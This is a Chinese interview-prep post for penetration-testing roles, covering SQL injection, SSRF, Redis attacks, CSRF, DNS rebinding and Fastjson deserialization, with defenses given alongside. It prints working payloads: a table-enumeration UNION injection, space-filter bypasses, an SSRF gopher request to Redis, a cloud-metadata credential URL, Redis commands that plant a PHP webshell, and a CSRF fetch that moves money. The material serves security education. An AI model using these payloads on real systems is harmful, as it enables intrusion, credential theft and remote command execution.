当前位置: 首页 > ds >正文

2025年渗透测试面试题总结-38(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

3. 渗透测试流程

4. SQL注入原理及Payload

5. SQL注入空格绕过技术

6. SQL注入防御及预处理局限性

7. 同源策略(SOP)

8. a.baidu.com 与b.baidu.com 同源判断

9. SSRF原理与利用

10. Redis攻击Payload

11. CSRF原理与防御

12. JSON格式CSRF利用技巧

13. SameSite属性

14. DNS重绑定攻击

15. Fastjson反序列化漏洞与修复

16. 子域名枚举工具与响应码200问题

17. Java掌握程度

回答总结

3.渗透测试的流程
4.SQL注入原理,及常用payload(手写-爆表名)
5.SQL注入空格不能使用如何绕过
6.SQL注入防御,延申预处理不能预防哪些注入
7.同源策略
8.a.baidu.com和b.baidu.com是否同源
9.SSRF原理,利用
10.攻击redis的方式(手写payload)
11.CSRF的原理及防御
12.一种特殊的CSRF场景:后端只解析json格式的时候如何利用CSRF(非更改Content-Type)
13.SameSite
14.DNS Rebinding
15.Fastjson反序列化及如何修复
16.子域名枚举用过那些工具,原理是什么,如果出现了任意子域名都返回200是什么原因?
17.Java学到哪种程度了?

3. 渗透测试流程

五阶段模型

  1. 情报收集
    • 被动侦察(Whois、DNS记录、GitHub信息泄露)
    • 主动扫描(Nmap端口扫描、Wappalyzer技术栈识别)
  2. 威胁建模
    • 绘制攻击面(网络拓扑、API端点、第三方组件)
    • 风险优先级排序(CVSS评分 + 业务影响)
  3. 漏洞分析
    • 自动化扫描(Nessus、Burp Suite)
    • 手动验证(逻辑漏洞、权限绕过)
  4. 渗透利用
    • 武器化攻击链(Metasploit模块、自定义EXP)
    • 横向移动(Pass-the-Hash、Kerberoasting)
  5. 报告与复测
    • 漏洞详情(PoC截图、风险等级、CWE编号)
    • 修复建议(代码示例 + 配置加固方案)

4. SQL注入原理及Payload

原理:未过滤用户输入,使攻击者拼接恶意SQL语句,破坏查询逻辑。
爆表名Payload(MySQL示例):sql

' UNION SELECT group_concat(table_name),2 FROM information_schema.tables WHERE table_schema=database()-- -

关键点

  • information_schema.tables 存储元数据
  • group_concat() 合并多行结果
  • -- - 注释后续语句

5. SQL注入空格绕过技术

当空格被过滤时,替代方案:

绕过方式示例适用场景
内联注释SELECT/**/1MySQL
括号包裹UNION(SELECT(1))多数数据库
特殊字符%09(Tab)、%0a(换行)URL编码场景
反引号/引号UNION`SELECT`1MySQL反引号特性

6. SQL注入防御及预处理局限性

防御方案

  • 参数化查询(Java:PreparedStatement,Python:cursor.execute(%s)
  • 输入过滤(正则匹配:/^[a-z0-9_]+$/
  • 最小权限原则(DB账号禁用DROPFILE权限)

预处理无法防御的场景

  1. 动态表名/列名
    javaString query = "SELECT * FROM " + userInput; // 预处理无效! 
  2. IN()子句参数化困难
    sqlWHERE id IN (?) // 只能绑定单值,需特殊处理 
  3. ORDER BY动态排序
    sqlORDER BY ? // 预处理会将参数视为字符串而非列名 

7. 同源策略(SOP)

定义:协议+域名+端口三者完全一致才允许跨域访问。
管控范围

  • DOM访问(iframe跨域隔离)
  • Cookie/Storage读取
  • AJAX请求(需CORS放行)

8. a.baidu.com 与b.baidu.com 同源判断

结论非同源

  • 原因:子域名不同(a vs b
  • 例外:可通过设置document.domain = 'baidu.com' 实现次级域同源(需双方主动配置)

9. SSRF原理与利用

原理:服务端发起未校验的网络请求,导致内网探测或协议滥用。
利用链

httpGET /proxy?url=http://192.168.1.1/admin HTTP/1.1 

高级利用

  • Redis未授权访问
    httpgopher://127.0.0.1:6379/_*2%0d%0a$4%0d%0aAUTH%0d%0a$16%0d%0a攻击者密码%0d%0a 
  • 云元数据泄露
    httphttp://169.254.169.254/latest/meta-data/iam/security-credentials/

10. Redis攻击Payload

写Webshell(需绝对路径):

bashredis-cli -h 目标IP flushall set shell "<?php system($_GET['cmd']);?>" config set dir /var/www/html config set dbfilename shell.php save 

11. CSRF原理与防御

原理:诱导用户会话中触发恶意请求(如转账链接)。
防御方案

方法实现
CSRF Token表单隐藏字段 + 服务端校验
SameSite CookieSet-Cookie: key=val; SameSite=Strict
验证Referer/Origin检查请求来源域名

12. JSON格式CSRF利用技巧

场景:后端仅接受Content-Type: application/json时,传统表单无效。
绕过方案

  1. Flash + 307跳转(已淘汰)
  2. JSONP劫持(仅GET请求)
  3. 构造恶意页面
    html<script> fetch('https://api.com/transfer', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({to: 'attacker', amount: 1000}) }) </script>
    前提:用户Cookie未设置SameSite=Lax/Strict

13. SameSite属性

模式跨站请求携带Cookie典型场景
None允许需HTTPS + 显式声明
LaxGET请求允许外部链接跳转
Strict禁止敏感操作

14. DNS重绑定攻击

原理:利用DNS响应TTL过期后返回新IP(如先指向攻击者IP,再绑定127.0.0.1),绕过同源策略访问内网。
防御

  • 应用层验证Host头
  • 防火墙限制内网访问

15. Fastjson反序列化漏洞与修复

漏洞根源@type属性指定任意类,触发JNDI注入(如com.sun.rowset.JdbcRowSetImpl )。
修复方案

  1. 升级至1.2.83+ 并开启safeMode
  2. 黑白名单控制(ParserConfig.getGlobalInstance().addDeny()
  3. 替换Gson/Jackson等更安全库

16. 子域名枚举工具与响应码200问题

工具与原理

工具原理
Sublist3r聚合搜索引擎数据(Google/SSL证书等)
AmassDNS暴力破解 + WHOIS反查
Assetfinder递归查询NS记录

全子域名返回200的可能原因

  1. 通配符DNS解析*.example.com → 同一IP
  2. 统一错误页面:所有未知子域名重定向至首页
  3. 负载均衡策略:未配置默认后端服务

验证方法

bashhost random12345.example.com # 检查随机子域名是否解析 

17. Java掌握程度

安全视角的Java能力

  • 漏洞分析:熟悉反射、类加载、JNDI等底层机制(支撑反序列化漏洞利用)
  • 安全编码
    • 避免Runtime.exec() ,改用ProcessBuilder
    • 密码存储用BCryptPasswordEncoder
  • 框架安全
    • Spring Security配置(CSRF防护、CORS策略)
    • Shiro权限绕过漏洞原理
  • JVM调优:内存马检测(分析java.lang.ClassLoader.defineClass 调用栈)

回答总结

  1. 技术深度覆盖:从注入漏洞到协议级攻击(如DNS重绑定)
  2. 防御实践导向:每个漏洞均提供可落地的修复方案
  3. 前沿场景适配:JSON CSRF、SameSite策略等新威胁详解
http://www.xdnf.cn/news/19278.html

相关文章:

  • WebRTC音频QoS方法五(音频变速算法之Expand算法实现)
  • 订餐后台管理系统 -day03 登录模块
  • Electron 项目来实现文件下载和上传功能(AI)
  • 前端网页源码模板 静态HTML源码网站
  • 【C++八股文】计算机网络篇
  • 企业级-搭建CICD(持续集成持续交付)实验手册
  • Web开发工具一套式部署Maven/Nvm/Mysql/Redis
  • 【问题】Windows的dockerdesktop/wsl虚拟化支持问题总结
  • 2025年OE SCI2区TOP,势场蚁群算法+无人水面艇路径规划,深度解析+性能实测
  • RustDesk(跨平台远程桌面软件) v1.4.1 中文绿色版
  • 根据并发和响应延迟,实现语音识别接口自动切换需求
  • 「日拱一码」058 机器学习——监督学习
  • CesiumJS 封装 - 初始化与配置
  • 《零基础入门AI:YOLOv2算法解析》
  • 【菜狗每日记录】VSCode远程连接多个账号、创建环境
  • Linux Shell 脚本基础002
  • Day16(前端:JavaScript基础阶段)
  • 8月科技前沿速递 | 存算一体开发者社区月报
  • HCIE考试截图及作答文件上传流程
  • Baseline|基线
  • 在vue/react项目中单独引入一个js文件,在js文件中使用DOMContentLoaded函数querySelectorAll为空数组解决办法
  • OpenCV轮廓近似与Python命令行参数解析
  • 第四十七天(jndi注入)
  • 柳州市委常委、统战部部长,副市长潘展东率队首访深兰科技集团新总部,共探 AI 赋能制造大市与东盟合作新局
  • 前端vue框架实现反向代理详解
  • 响应式编程框架Reactor【3】
  • 【物联网】关于 GATT (Generic Attribute Profile)基本概念与三种操作(Read / Write / Notify)的理解
  • OpenAI Sora深度解析:AI视频生成技术如何重塑广告电商行业?影业合作已落地
  • WebGIS开发智慧校园(8)地图控件
  • 【实时Linux实战系列】实时自动化测试框架